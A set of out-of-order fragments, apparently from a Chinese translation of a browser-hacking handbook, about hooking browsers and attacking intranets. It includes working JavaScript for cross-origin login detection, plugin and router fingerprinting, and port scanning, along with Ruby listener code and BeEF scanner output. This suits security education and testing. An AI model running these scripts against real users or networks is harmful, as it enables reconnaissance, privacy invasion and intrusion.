text
stringlengths
64
2.99M
比如可以使用下面的脚本: var target = "http://172.16.37.147"; /* 要检查的资源(名称,路径)*/ var resources = [ ["Drupal - FileBrowser","modules/filebrowser/"], ["Drupal - FFmpeg", "modules/ffmpeg/"], ["WordPress - AccessLogs", "wp-content/plugins/access-logs/"] ]; /* 上层路径(/或/drupal)*/ var paths = ["/", "/drupal/"]; function add_tag(src){ for(var p=0; p < paths.length; p++) { // 对每个上层路径,创建最终的URI var uri = target + paths[p] + src; var i = document.createElement('script'); i.src = uri; i.style.display = 'none'; i.onload = function(){ console.log(uri + " -- FOUND"); }; i.onerror = function(){ console.log(uri + " -- NOT-FOUND"); }; document.body.appendChild(i); } } /* 对每个待检查的资源,添加新的script标签*/ for(var c=0; c < resources.length; c++) { add_tag(resources[c][1]); } 你都看到了,这里没有使用 img 标签,而是使用了 script 标签。
6 Sky. (2012). Sagem router firmware . Retrieved October 8, 2013 from http://www.skyuser.co.uk/skyinfo/the_sagem_f_st_2504_router_gets_a_new_fw.html 与很多类似的设备一样,这款路由器可以通过http://192.168.0.1:80这样的URL访问到,而且对外暴露了JavaScript文件和图片可供我们验证。
可以使用以下代码来识别Sagemcom路由器: // 默认的路由器IP var target = "192.168.0.1"; // 默认的路由器图片 var fingerprint_data = new Array( new Array( "Sky Sagemcom Router", "80","http",true, "/sky_images/arrows.gif",8,16), new Array( "Sky Sagemcom Router", "80","http",true, "/sky_images/icons-broadband.jpg",43,53) ); var dom = document.createElement('b'); for(var u=0; u < fingerprint_data.length; u++) { var img = new Image; img.id = u; img.src = fingerprint_data[u][2]+"://"+target +":"+fingerprint_data[u][1]+ fingerprint_data[u][4]; // 触发onload事件,找到了图片 img.onload = function() { // 再次检查宽度和高度 if(this.width == fingerprint_data[this.id][5] && this.height == fingerprint_data[this.id][6]){ console.log("Found " + fingerprint_data[this.id][4] + " -> " + fingerprint_data[this.id][0]); // 完工,从DOM中删除图片 dom.removeChild(this); } } // 将图片添加到DOM dom.appendChild(img); } 运行前面代码的结果如图9-5所示,确认了可以通过http://192.168.0.1:80访问Sagemcom路由器。
7 Gareth Heyes. (2007). JS Lan Scanner . Retrieved October 8, 2013 from http://code.google.com/p/jslanscanner/source/browse/trunk/lan_scan/js/lan_scan.js 成功发现并确认了路由器之后,接下来就要访问设备。
Unknown 第 1 章 浏览器安全概述 天生低调的浏览器却肩负着保护用户安全的重任。浏览器的工作机制,就是向整个互联网请求指令,请求到以后几乎不加任何质疑地去执行。浏览器之所以为浏览器,就是要忠实地汇聚远程获取的内容,把它们组织成人类可以辨识的形式,同时还要支持今天所谓的Web 2.0应有的丰富功能。 但是作为一款软件,浏览器又是如此重要:它不仅要帮你维护社交网络,还要替你完成在线银行的交易。这个软件有义务保证你在网络世界中的安全,无论你冒险闯入的是什么胡同街巷。这个软件有义务支持你在一个标签页里不知深浅的探险,同时又在另一个标签页里进行重大涉密交易。很多人把自己的浏览器当成装甲车,认为自己能坐在里面安全舒适地观察外面的世界,而不用担心泄漏任何个人隐私,或者遭受任何威胁。等把这本书全看完,你就会明白这个假设是否成立了。 这款“无所不能”的神奇软件的开发团队,必须确保其庞大身躯的每个角落、每道接缝,都不给黑客留下可乘之机。不管你是否这么想过,实际上你每次使用浏览器,都默认信任了从未谋面(很可能这辈子永远也不会见面)的一群人,相信这群人能够保障你的重要信息不会被互联网上的黑客窃取。 本章介绍Web浏览器攻防相关的方法论。我们会讨论浏览器在Web生态系统中扮演的角色,包括它与Web服务器之间的互动关系。此外,本章还会介绍一些浏览器安全基础知识,为本书后续各章的内容提供脉络。 Unknown 第 6 章 攻击浏览器 浏览器如今作为一个门户,每天都有数不清的人在使用。通过它联系朋友,通过它为在线游戏中的庄稼浇水,通过它上网购物,通过它管理自己的银行账号,通过它娱乐,通过它获取信息。浏览器已经远远不再是一个查看网页的工具了,它已经成为帮助我们运行其他应用的应用。 过去,浏览器成为主要的攻击目标是因为它想支持的众多功能 1 。从安全角度看,浏览器走过了一段非常长的路。如今的浏览器都把安全作为一个重要特性,比如图6-1所示的Firefox。 1 Eric Cole. (2009). Network Security Bible, 2nd Edition . Retrieved August 12, 2013 from http://eu.wiley.com/WileyCDA/WileyTitle/productCd-0470502495.html 图 6-1 Firefox:快速、灵活、安全 但这并不意味着攻击者会放过浏览器。事实刚好相反。攻击者(以及安全研究者)投入了大量的时间和精力攻击Web浏览器。甚至都有专门的公开比赛,用丰厚的奖金鼓励人们去发现新颖的方式以攻击最新版本的浏览器 2 。有些浏览器厂商还会设立bug奖金或现金大奖,颁发给那些发现浏览器漏洞的人 3 。 2 Wikipedia. (2013). Pwn2Own . Retrieved August 12, 2013 from http://en.wikipedia.org/wiki/Pwn2Own 3 Google. (2010). Program Rules—Application Security . Retrieved August 12, 2013 from http://www.google.com/about/appsecurity/reward-program/ 浏览器从桌面到移动端的延伸,令其更加成为众矢之的。我们生在一个万物互联的时代,漫步街头,总能看到人们拿着手机,聊着Twitter,拍着Instagram,通过分享、发帖、评论、留言来表达心情或讨论问题,甚至只是消磨时光,在无边无限的互联网之海中畅游。 随着人们口袋里的设备能够访问的站点和服务越来越多,他们对设备的信任感也与日俱增。在线银行和在线购物是完全互联网化的两个主要领域。令人惊奇的是,移动在线商务,特别是手机银行,居然最早出现在非洲的发展中国家 4 。2011年 5 ,手机银行系统在非洲、亚太地区和拉丁美洲爆发,其中非洲份额居然占到当时系统总量的30%。 4 Jonathan Greenacre. (2012). Say goodbye to the branch—the future for banking is upwardly mobile . Retrieved August 12, 2013 from http://theconversation.edu.au/say-goodbye-to-the-branch-the-future-for-banking-is-upwardly-obile-10191 5 Michael Klein and Colin Mayer. (2011). Mobile Banking and Financial Inclusion—The Regulatory Lessons . Retrieved August 12, 2013 from http://www-wds.worldbank.org/servlet/WDSContentServer/WDSP/IB/2011/05/18/000158349_20110518143113/Rendered/PDF/WPS5664.pdf 本章将探讨如何直接攻击浏览器,也就是利用浏览器自身的漏洞,不管它安装了什么扩展或插件。具体来说,我们会探讨采集浏览器指纹、攻击会话和cookie、HTTPS攻击,以及其他利用浏览器漏洞的高级技术。 Unknown 祝你好运 浏览器安全是互联网上升级最快的军备竞赛之一。对所有关注安全的人来说,它都是一个迷人而又有趣的领域。这个军备竞赛升级的步伐之所以慢不下来,主要是因为各种公司日益依赖浏览器去做越来越多的事。 我们注意到,大大小小的公司越来越认为不应该在桌面计算机中运行一个独立的软件。而任何预测浏览器将逐渐没落的人,都应该好好地清醒清醒,因为他们可能还在使用着隐患多多的Java插件呢! 浏览器军备竞赛和商业公司对它的广泛应用,使得浏览器的攻击面不断变化,而来自安全的挑战从未绝迹。现在,我们就准备大干一场,看看黑客如何攻击浏览器,而我们又应该如何加强防御!
先运行如下Ruby代码,准备好在服务器上处理POST和GET请求: require 'rubygems' require 'thin' require 'rack' require 'sinatra' class XhrHandler < Sinatra::Base post "/" do puts "POST from [#{request.user_agent}]" params.each do |key,value| puts "POST body [#{key}->#{value}]" end p "[+] Content-Type [#{request.content_type}]" p "[+] Body [#{request.body.read}]" # p "Raw request:\n #{request.env.to_s}" end get "/" do puts "GET from [#{request.user_agent}]" params.each do |key,value| puts "[+] Request params [#{key} -> #{value}]" end end options "/" do puts "OPTIONS from [#{request.user_agent}]" puts "[+] The preflight was triggered" end end @routes = { "/xhr" => XhrHandler.new } @rack_app = Rack::URLMap.new(@routes) @thin = Thin::Server.new("browserhacker.com", 4000, @rack_app) Thin::Logging.silent = true Thin::Logging.debug = false puts "[#{Time.now}] Thin ready" @thin.start 这些代码依赖一些常见的Ruby库才能运行。
接下来需要在浏览器控制台中运行如下JavaScript脚本,该脚本会尝试和监听服务器通信: var uri = "http://browserhacker.com"; var port = 4000; xhr = new XMLHttpRequest(); xhr.open("GET", uri + ":" + port + "/xhr?param=value", true); xhr.send(); xhr = new XMLHttpRequest(); xhr.open("POST", uri + ":" + port + "/xhr", true); xhr.setRequestHeader("Content-Type", "text/plain"); xhr.setRequestHeader('Accept','*/*'); xhr.setRequestHeader("Accept-Language", "en"); xhr.send("a001 LIST \r\n"); 两个请求都发送到browserhacker.com:4000。
在Chrome中测试之后,可以看到如下输出: $ ruby XMLHttpRequest-test-server.rb [2013-07-07 20:05:42 +1000] Thin ready POST from [Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/53 7.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36] "[+] Content-Type [text/plain]" "[+] Body [a001 LIST \r\n]" GET from [Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537 .36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36] [+] Request params [param -> value] 浏览器以及版本不同,输出的内容也可能有差异。
1 Mozilla Developer Network. (2013). HTTP access control (CORS) . Retrieved June 15, 2013 from https://developer.mozilla.org/en-US/docs/HTTP/Access_control_CORS 如果CORS请求没有使用 简单方法 2 或 简单首部 3 ,就会发送前置请求。
2 W3C. (2013). Cross-origin Resource sharing Terminology . Retrieved June 15, 2013 from http://www.w3.org/TR/cors/#simple-method 3 W3C. (2013). Cross-origin Resource sharing Terminology . Retrieved June 15, 2013 from http://www.w3.org/TR/cors/#simple-header 前面的JavaScript XMLHttpRequest 代码故意使用了 text/plain 内容类型,以触发更复杂的浏览器CORS逻辑。
Unknown 9.11 小结 本章介绍了可以通过勾连浏览器对Web应用发起的各类攻击,其中很多是跨域执行而又不违反SOP的。如果你是一个攻击者,掌握这些技术之后,就可以进一步伪装隐蔽自己,并访问那些位于内部网中不能路由到的Web应用。 我们还讨论了如何识别和利用跨域漏洞,包括RCE、SQL注入和XSS攻击。 经过学习,相信大家已经知道了怎么通过(跨域发现的)XSS漏洞勾连目标源,进而扩大自己能够控制的攻击面。有了勾连之后,就可以通过Tunneling Proxy访问这个刚被控制的源,从而可能利用到认证会话,并绕过一些使用HttpOnly的防御措施。Burp和Sqlmap等标准的安全工具,也可以使用Tunneling Proxy通过勾连浏览器发送请求。 这一章还展示了能够跨域发起标准的Web应用攻击。这些攻击可以利用内部网设备中的RCE漏洞。 下一章,我们继续围绕内部网中的勾连浏览器展开讨论。但攻击目标是一些非Web服务,使用的方法涉及内部协议通信与利用等。 Unknown 3.5 小结 在本章中,我们认识到了持续控制是攻击浏览器的前提。建立通信渠道并且持久化控制,对于成功征服目标而言至关重要。 这一章展示了很多实现通信和持久化的技术,至于选择使用哪个或哪些方法则取决于你,主要还是看效果。一种可能的方案是在与浏览器通信时,可以使用标准的 XMLHttpRequest 通信渠道,而后在支持的情况下再自动升级到WebSocket协议。更进一步,可以利用内嵌框架和底层弹出窗口,实现持久化的目标。最佳选择还是要看具体的攻击环境。 保持对目标浏览器的控制,让我们有机会将不同的攻击代码模块化,同时实时作出决定。这样才能进入所谓的攻击反馈循环。某个特定的操作可能会导致一个问题,而对这个问题的深入研究又会暴露更多问题。利用这种方法,你可以选择作出不同的决定。比如,你可以找到目标浏览器本地网络中所有活动的主机,然后选择只扫描它们的端口。 此外,本章还探讨了各种降低你的指令被过滤掉的可能性的技术。使用这些方法会让简单的手工分析更加困难。当然,这些方法的有效性还要看你使用了什么模糊技术,以及目标使用了什么防护技术。 在掌握了各种可用于持续控制目标浏览器的技术后,你该知道怎么利用浏览器的功能对其自身发起攻击了。接下来的几章将聚焦在攻击浏览器上面。 Unknown 8.4 小结 浏览器插件旨在增加浏览器功能,为用户提供更丰富的体验。无论是查看新的媒体类型、增强应用功能,或者与其他服务通信,插件都为Web增加了无限可能。当然,与此同时,可被攻击的地方也变多了。要确定浏览器安装了什么插件并不难。通过查询DOM或加载ActiveX插件,BeEF可以确定加载了什么插件,并识别有漏洞的插件。 Java、Firefox和Chrome实现的Click to Play安全特性,虽然可以提高安全性,但已经被证明仍然是可以攻破的。本章讨论了在Java和Firefox中绕过点击播放的示例,但那些漏洞已经被修复了。不过,随着新的绕行技术出现,机会仍然存在。 本章还用较大篇幅讨论了Java、ActiveX及其他流行的媒体插件,但相关的利用技术对其他插件也适用。或许你会在终端安全评估中遇到一个不那么常见的插件,但只要可以方便地取得该插件,那么就没什么可以阻挡你去分析它的漏洞。 攻击插件并不单纯依赖浏览器,也依赖第三方应用组件。如果你知道受害人系统中安装了有漏洞的应用,也可通过浏览器去攻击该应用。 执行本地文件等利用技术,可以与其他复杂一些的攻击手段结合使用,以获得对目标系统的较高访问权限。另外的一些利用相对简单,只要一个URL就可以实现。插件沙箱尝试解决这个问题,但通过使用签名的插件、社会工程学,或者利用已有的信任关系,这样的限制同样有可能被打破以实现利用。 Chromium团队发表的一份声明 42 也提到了浏览器插件。考虑到稳定性和安全性,Chrome会在2014年底结束对古老的Netscape Plugin API(NPAPI)的支持。加上Mozilla要求Firefox用户在运行插件前先接受插件 43 ,看起来插件这个攻击面正开始缩小。 42 Chromium Blog. (2013). Saying Goodbye to Our Old Friend NPAPI . Retrieved October 23, 2013 from http://blog.chromium.org/2013/09/saying-goodbye-to-our-old-friend-npapi.html 43 Mozilla Blog. (2013). Plugin activation in Firefox . Retrieved October 23, 2013 from https://blog.mozilla.org/futurereleases/2013/09/24/plugin-activation-in-firefox/ 虽然Chrome和Firefox都在增加对使用插件的限制,但插件也不会在一夜之间消失。此外,由于历史原因及企业级需求,微软不大可能放弃对ActiveX插件的支持。无论各浏览器厂商有什么策略,只要用户愿意点击Accept,浏览器插件就还是侵入有漏洞的系统的一道大门。
Unknown 9.4 跨域认证检测 大多数具有一定逻辑功能的Web应用,都会把认证后和认证前可以访问的资源分开存放。 对于未认证用户访问需要认证后才能访问的资源,这些Web应用常用的方法是响应403或404 HTTP状态码。而对于登录之后的请求资源的用户,则响应200状态码。 另一个常用的方法是响应302 HTTP重定向状态码,将其用于请求受认证保护的路径下不存在的资源。比如,假设你请求http://browserhacker.com/admin/non_existent,在这里所有位于/admin/路径下的资源都要求用户认证。如果是未认证用户访问/admin/non_existent,Web应用就会响应302状态码,将其重定向回登录页面/admin/login。相反,如果是认证后的用户请求/admin/non_existent,就会得到404未找到错误。 Mike Cardwell分析了很多社交网络站点,检查它们是否都使用类似的HTTP状态码。他的分析揭示了有意思的结果 8 。比如Twitter,以第二种情况访问不存在的资源为例,会根据用户会话是否认证过,返回一个302或404。 8 Mike Cardwell. (2011). Abusing HTTP Status Codes to Expose Private Information . Retrieved June 15, 2013 from https://grepular.com/Abusing_HTTP_Status_Codes_to_Expose_Private_Information 我们知道,HTML的 script 标签在要加载的资源返回403、404或500状态码的情况下会触发 onerror 事件,而在资源返回200或302状态码的时候会触发 onload 事件。而且,Twitter需要认识后才能访问/account/*路径下的资源。知道了这两方面的信息之后,就可以判定勾连浏览器是否已经在某个打开的标签页(或窗口)中登录到了Twitter,而且你可以在不违反SOP的情况下跨域这么做。下面的代码可以帮我们做到: var script = document.createElement("script"); script.onload = function(){ alert('not logged in') }; script.onerror = function(){ alert('logged in') }; script.src = "https://twitter.com/account/non_existent"; var head = document.getElementsByTagName("head")[0]; head.appendChild(script); 如图9-6所示,如果勾连浏览器没有登录到Twitter,则在请求/account/non_existent这个不存在的资源时,服务器会返回302状态码。这会触发脚本标签的 onload 事件。 图 9-6 检测到受害者没有登录Twitter 而如果勾连浏览器登录到了Twitter,如图9-7所示,请求同样不存在的资源就会返回404状态码,从而触发 onerror 事件。 图 9-7 检测到受害者登录了Twitter 监控资源加载时间也是跨域检测常用的技术。可以根据认证会话与非认证会话加载资源的时间差,推断出一些重要的信息。基于这些信息,可以判断浏览器是否登录到了某个应用。 Haroon Meer和Marco Slaviero在2007年的DEF CON 15上展示了这个技术 9 ,他们使用内嵌框架和自定义的 onload 事件处理程序,监控框架内资源的加载时间。加载时间的差别越大,结果就越精确。Web应用中的很多交互都会导致时间延长。 9 H. Meer and M. Slaviero. (2007). It's all about timing . Retrieved June 15, 2013 from http://www.defcon.org/images/defcon-15/dc15-presentations/Meer_and_Slaviero/Whitepaper/dc-15-meer_and_slaviero-WP.pdf 默认安装的Drupal 6就是一个不错的例子。如果你登录了,并且请求http://browserhacker.com/drupal/?q=admin,内容长度就会是3264字节。如果你没有登录并请求同一个URL,就会收到403 HTTP状态码,内容长度为1374字节。 内容越多,加载时间往往越长,当然也可能是毫秒级的。下面的代码可以执行上面的查询,但请注意进行修改,以适合你的需要和要测试的应用: var add_iframe; var counter = 5; var sum = 0; /* 匹配的平均时间。在此种情况下为 http://browserhacker.com/drupal/?q=admin资源: 登入用时> 210ms 未登入用时< 210ms */ var avg_to_match = 210; function append(){ if(counter > 0){ var i = document.createElement("iframe"); i.src = "http://browserhacker.com/drupal/?q=admin"; var start = new Date().getTime(); console.log('start:' + start); /* 自定义onload处理程序监控加载时间*/ i.onload = function(){ var end = new Date().getTime(); console.log('end:' + end); var total = end - start; console.log('total:' + total); sum += total; counter--; } document.body.appendChild(i); }else{ clearInterval(add_iframe); var avg = sum / 5; var logged_in = true; console.log("sum: " + sum + ", avg:" + avg); if(avg < 210){ logged_in = false; } console.log("logged in Drupal 6: " + logged_in); } } add_iframe = setInterval(function(){append()},500); 继续以Drupal为例,图9-8和图9-9展示了运行前面脚本之后的结果。注意总时长和平均时间的差别。 图 9-8 检测到受害者未登录到Drupal 图 9-9 检测到受害者登录到了Drupal 如果能准确知道勾连浏览器是否登录到了Web应用,那么接下来发动攻击就会更靠谱。有了这些先决信息,再知道没有被XSRF token保护的资源,就可以伪装成浏览器用户,执行各种操作。
Unknown 7.4 小结 把功能从浏览器核心转移到扩展中,确实能够防止浏览器体积过大。但是,这样一来也就把一些重要功能的开发和维护,交到了安全意识没有那么强的一些开发者手中。安全意识差,同时还被赋予了较高权限,就导致很多扩展出现了安全问题。有人认为,浏览器本身没有过于膨胀的代价是整体安全性降低了。 对于扩展如何增强浏览器体验,可以从多个角度去看待。有时候,或许把扩展看成每个页面都会运行的一种虚拟的Web应用更合适。而另一时候,或许可以把它们看成安装在操作系统中的应用。无论如何,都应该知道它们会在特权环境下运行,并且有权访问特权API。 本章分析了浏览器扩展的构成,以及如何检测勾连浏览器是否安装了你想攻击的扩展。我们探讨了多个扩展攻击面,以及不同的漏洞类别。通过学习,掌握了跨上下文脚本攻击的原理,以及扩大权限的一些可靠方法。 总之,这一章全面讨论了利用Chrome和Firefox扩展的复杂技术。下一章会深入研究浏览器插件。插件是增强浏览器体验的另一种流行的方式,同样也有着可观的攻击面。
8 SPI Dynamics Labs. (2006). Detecting, Analyzing, and Exploiting Intranet Applications using JavaScript . Retrieved October 29, 2013 from http://www.rmccurdy.com/scripts/docs/spidynamics/JSportscan.pdf 此后不久,Jeremiah Grossman在BlackHat 2006上发布了自己的研究成果 9 ,亮点就是通过浏览器来攻击内网的例子。
后来,Petko Petkov 10 发布了第一套可靠的JavaScript端口扫描程序的实现,如下所示: 9 Jeremiah Grossman. (2006). Hacking intranet websites from the outside . Retrieved October 29, 2013 from http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Grossman.pdf 10 Petko Petkov. (2006). JavaScript portscanner . Retrieved October 29, 2013 from http://www.gnucitizen.org/blog/javascript-port-scanner/ scanPort: function(callback, target, port, timeout){ var timeout = (timeout == null)?100:timeout; var img = new Image(); img.onerror = function () { if (!img) return; img = undefined; callback(target, port, 'open'); }; img.onload = img.onerror; // 注意,用了http:// img.src = 'http://' + target + ':' + port; setTimeout(function () { if (!img) return; img = undefined; callback(target, port, 'closed'); }, timeout); }, // ports_str应该会像"80,8080,8443"之类的 scanTarget: function(callback, target, ports_str, timeout){ var ports = ports_str.split(","); for (index = 0; index < ports.length; index++) { this.scanPort(callback, target, ports[index], timeout); }; } 虽然这种技术年代有点久远了,但目前仍然被认为是较为可靠的端口扫描方法。
比如,在浏览器中通过 端口封禁 (port banning)可以限制哪些端口能通过HTTP请求来访问。 10.3.1 绕过端口封禁 除了同源策略,现代浏览器通常都具备另一项限制功能,可以防御对非HTTP服务的攻击。 这个功能被称为 端口封禁 ,可以屏蔽对22、25、110或143等特殊端口的请求,以防止浏览器向运行在已知端口上的服务发出请求。 端口封禁 端口封禁是浏览器实现的一种安全防范机制,可以拒绝对非标准TCP端口的连接。
)虽然这种安全机制也可以放宽,但与其他安装机制不同,它不能像SOP那样通过特殊的HTTP首部、HTML标签或属性来配置,而是所有配置都放在浏览器核心配置项里面。
图 10-6 尝试通过HTTP协议连接143端口时出错 图 10-7 Netcat监听器(未收到数据) 端口封禁会拒绝发送到某些TCP端口的请求,这是大多数浏览器都已经实现的防御机制。
11 Sandro Gauci. (2002). Extended HTML Form Attack . Retrieved October 29, 2013 from http://eyeonsecurity.org/papers/Extended%20HTML%20Form%20Attack.htm 12 Sandro Gauci. (2008). The Extended HTML Form Attack revisited . Retrieved October 29, 2013 from https://resources.enablesecurity.com/resources/the%20extended%20html%20form%20attack%20revisited.pdf 对于开源浏览器,由于其代码公开可读,所以它们封禁的TCP端口是众所周知的。
13 The Chromium Authors. (2012). net_util.cc . Retrieved October 29, 2013 from http://src.chromium.org/svn/trunk/src/net/base/net_util.cc 14 Mozilla. (2008). nsIOService.cpp . Retrieved October 29, 2013 from http://lxr.mozilla.org/seamonkey/source/netwerk/base/src/nsIOService.cpp#87 有读者可能想验证开源和闭源浏览器都封禁了哪些端口,那么可以使用下面给出的代码来检测实际被封禁的TCP端口。
另外,还需要设置iptables,将所有TCP端口的请求转发到服务器脚本监听的端口。 假设你把脚本绑定到了192.168.0.3:10000,那么可以在iptables中使用以下配置,将所有流量转发给TCP端口10000: iptables -A PREROUTING -t nat -i eth1 -p tcp --dport\ 1:65535 -j DNAT --to-destination 192.168.0.3:10000 这样就不用分别监听每一个TCP端口了。
下面的Ruby代码会负责监听TCP端口10000: require 'socket' @@not_banned_ports = "" def bind_socket(name, host, port) server = TCPServer.new(host,port) loop do Thread.start(server.accept) do |client| data = "" recv_length = 1024 threshold = 1024 * 512 while (tmp = client.recv(recv_length)) data += tmp break if tmp.length < recv_length || tmp.length == recv_length # 512 KB max of incoming data break if data > threshold end if data.size > threshold print_error "More than 512 KB of data" + " incoming for Bind Socket [#{name}]." else headers = data.split(/\r\n/) host = "" headers.each do |header| if header.include?("Host") host = header break end end port = host.split(/:/)[2] || 80 puts "Received connection on port #{port}" @@not_banned_ports += "#{port}\n" client.puts "HTTP/1.1 200 OK" client.close end client.close end end end begin bind_socket("PortBanning", "192.168.0.3", 10000) rescue Exception File.open("not_banned_browserX",'w'){|f| f.write(@@not_banned_ports) } end 服务器端代码使用不同的线程处理每个连接,并解析HTTP请求首部。
这段代码会每隔100毫秒就向一个不同的TCP端口发送一次XHR请求,端口号从1开始,到7000为止: var index = 1; // 迭代到TCP端口7000 var end = 7000; var target = "http://192.168.0.3"; var timeout = 100; function connect_to_port(){ if(index <= end){ try{ var xhr = new XMLHttpRequest(); var port = index; var uri = target + ":" + port + "/"; xhr.open("GET", uri, false); index++; xhr.send(); console.log("Request sent to port: " + port); setTimeout(function(){connect_to_port();},timeout); }catch(e){ setTimeout(function(){connect_to_port();},timeout); } }else{ console.log("Finished"); return; } } connect_to_port(); 通过在多个浏览器中执行以上代码,你会收到一堆结果。
如果发现文件中有间断,则说明缺少的端口被封禁了,因为没有收到连接信息: port = 1 banned_ports = Array.new previous_port = 1 File.open('not_banned_browserX').each do |line| current_port = line.chomp.to_i if(current_port == port) # go to next port port = port + 1 elsif(port < current_port) diff = current_port - port diff.times do puts "Banned port: #{port.to_s}" banned_ports << port.to_s port = port + 1 end port = current_port + diff end end puts "Banned port list:\n#{banned_ports.join(',')}" 图10-8展示了一次检测的结果,包含Firefox、IE、Chrome和Safari浏览器各自封禁的端口。
图 10-8 不同浏览器封禁的端口 Chrome和Safari封禁的端口完全相同(最大端口号也一样),而它们与Firefox和IE却有诸多不同。 IE是最宽容的浏览器,封禁的端口最少,只会屏蔽对下列端口的连接: 19,21,25,110,119,143,220,993 与Firefox一样,IE也允许连接到IRC端口。
10.3.2 使用 IMG 标签扫描端口 下面给出的方法与Petko Petkov的JavaScript端口扫描程序的实现类似(该扫描程序是他创建的AttackAPI 15 工具包中的工具之一)。
Javier Marcos针对BeEF项目改进了这个方案,并在OWASP AppSec USA 2011大会 16 上对公众发表,其代码如下所示: 15 Petko Petkov. (2010). Attack API . Retrieved October 29, 2013 from https://code.google.com/p/attackapi/ 16 Javier Marcos and Juan Galiana. (2011). Pwning intranets with HTML5 . Retrieved October 29, 2013 from http://2011.appsecusa.org/p/pwn.pdf function http_scan(start, protocol_, hostname, port_){ var img_scan = new Image(); img_scan.onerror = function(evt){ var interval = (new Date).getTime() - start; if (interval < closetimeout){ if (process_port_http == false){ port_status_http = 1; // closed console.log('Port ' + port_ + ' is CLOSED'); clearInterval(intID_http); } process_port_http = true; } }; // 对onerror和onload事件调用同样的处理程序 img_scan.onload = img_scan.onerror; img_scan.src = protocol_ + hostname + ":" + port_; intID_http = setInterval(function(){ var interval = (new Date).getTime() - start; if (interval >= opentimeout){ if (!img_scan) return; img_scan = undefined; if (process_port_http == false){ port_status_http = 2; // open process_port_http = true; } clearInterval(intID_http); console.log('Port ' + port_ + ' is OPEN '); } } , 1); } var protocol = 'http://'; var hostname = "172.16.37.147"; var process_port_http = false; var port_status_http = 0; // unknown var opentimeout = 2500; var closetimeout = 1100; var ports = [80,5432,9090]; for(var i=0; i<ports.length; i++){ var start = (new Date).getTime(); http_scan(start, protocol, hostname, ports[i]); } 图10-9展示了在Firefox中运行上面的代码,以验证三个未被封禁的TCP端口(80、5432和9090)的结果。
17 Michele Orru. (2013). BeEF RESTful API . Retrieved October 29, 2013 from https://github.com/beefproject/beef/wiki/BeEF-RESTful-API ipHost :要扫描端口的目标IP地址。
以下就是只使用一个浏览器时的命令(需要输入的命令加粗了): $ ruby ./dist_pscanner.rb [>>>] BeEF Distributed Port Scanner] [+] Retrieved RESTful API token: 006c1aed13b124d0c1c8fb50c98fb35d04a78d5e [+] Retrieved Hooked Browsers list. Online: 3 [+] Retrieved 185 available command modules [+] Online Browsers: [1] 127.0.0.1 - C28 Macintosh [2] 192.168.1.101 - C28 Windows?7 [3] 127.0.0.1 - C28 Macintosh [+] Provide a comma separated list of browsers to use (i.e. 1 or 1,3 or 1,2,3 etc): 1 [+] Using: [1] 127.0.0.1 - C28 Macintosh [+] Enter target IP to port scan: 192.168.1.254 [+] Enter target ports to scan (i.e. 1-65535 or 22-80 or 1-1024): 70-80 [+] Split will be as follows: [1] 70-80 [+] Ready to proceed? <Enter> [+] Starting port scan against 192.168.1.254 from 70-80 [1] [+] Scan queued... [1] port=Scanning: 70,71,72,73,74,75,76,77,78,79,80 [1] port=WebSocket: Port 80 is OPEN (http) [1] Scan Finished in 43995 ms [+] All Scans Finished!! Time Taken: 60.248801 在这个例子中,只有一个Chrome浏览器扫描了一个IP地址的70到80端口,用时约60秒。 如果使用3个勾连浏览器完成同样的任务,你会发现结果会稍有不同: $ ruby ./dist_pscanner.rb [>>>] BeEF Distributed Port Scanner] [+] Retrieved RESTful API token: 006c1aed13b124d0c1c8fb50c98fb35d04a78d5e [+] Retrieved Hooked Browsers list. Online: 3 [+] Retrieved 185 available command modules [+] Online Browsers: [1] 127.0.0.1 - C28 Macintosh [2] 192.168.1.101 - C28 Windows?7 [3] 127.0.0.1 - C28 Macintosh [+] Provide a comma separated list of browsers to use (i.e. 1 or 1,3 or 1,2,3 etc): 1,2,3 [+] Using: [1] 127.0.0.1 - C28 Macintosh [2] 192.168.1.101 - C28 Windows?7 [3] 127.0.0.1 - C28 Macintosh [+] Enter target IP to port scan: 192.168.1.254 [+] Enter target ports to scan (i.e. 1-65535 or 22-80 or 1-1024): 70-80 [+] Split will be as follows: [1] 70-73 [2] 74-77 [3] 78-80 [+] Ready to proceed? <Enter> [+] Starting port scan against 192.168.1.254 from 70-73 [1] [+] Scan queued... [+] Starting port scan against 192.168.1.254 from 74-77 [2] [+] Scan queued... [+] Starting port scan against 192.168.1.254 from 78-80 [3] [+] Scan queued... [1] port=Scanning: 70,71,72,73 [2] port=Scanning: 74,75,76,77 [3] port=Scanning: 78,79,80 [3] port=CORS: Port 80 is OPEN (http) [3] port=WebSocket: Port 80 is OPEN (http) [2] Scan Finished in 14800 ms [3] Scan Finished in 11997 ms [1] Scan Finished in 15998 ms [+] All Scans Finished!! Time Taken: 32.306009 把同一个命令分配到3个浏览器上,耗时会从原来的60秒减少到约32秒。
在浏览器五彩斑斓的历史长河中,总是你方唱罢我登场,热闹非凡。 有赢家,也有输家,有小众的最爱,也有大众的选择,而且各家浏览器的声望也是此起彼伏。
服务器会发送CSP HTTP首部Content-Security-Policy或X-Content-Security-Policy,以规定可以从哪里加载脚本,同时还规定了对这些脚本的限制,比如是否允许执行JavaScript的 eval() 函数。
3. HttpOnly cookie标志 HttpOnly是另一个应用给cookie的标志,而且所有现代浏览器都支持它。 HttpOnly标志的用途是指示浏览器禁止任何脚本访问cookie内容,这样就可以降低通过JavaScript发起的XSS攻击(详见第2章)偷取cookie的风险。
而 nosniff 指令可以禁用浏览器的上述行为,强制浏览器按照Content-type首部来渲染内容。 举个例子,如果服务器给一个 script 标签返回的响应中带有 nosniff 指令,那么除非响应的MIME类型是 application/javascript (或其他几个字符串),否则浏览器会忽略响应内容。
从浏览器安全角度来看,很可能有人会利用这一点控制浏览器。 比如,这个人上传一种允许上传的文件(看起来似乎很安全),而浏览器随后却以另一种比较危险和易变的方式去解释它。
这种攻击是把诱导页面放到一个完全透明的前景框架窗口中,而用户以为自己点击的是下方不透明的(被攻击的)页面,实际上点击的却是透明的前景(诱导)页面。
1.3.2 反射型XSS过滤 这个浏览器安全特性试图检测、清除和阻止第2章将会介绍的 反射型XSS (Reflected XSS)。 浏览器会尝试被动地发现已经成功的反射型XSS攻击,然后尝试清除响应中的脚本,更多的时候是阻止它们执行。
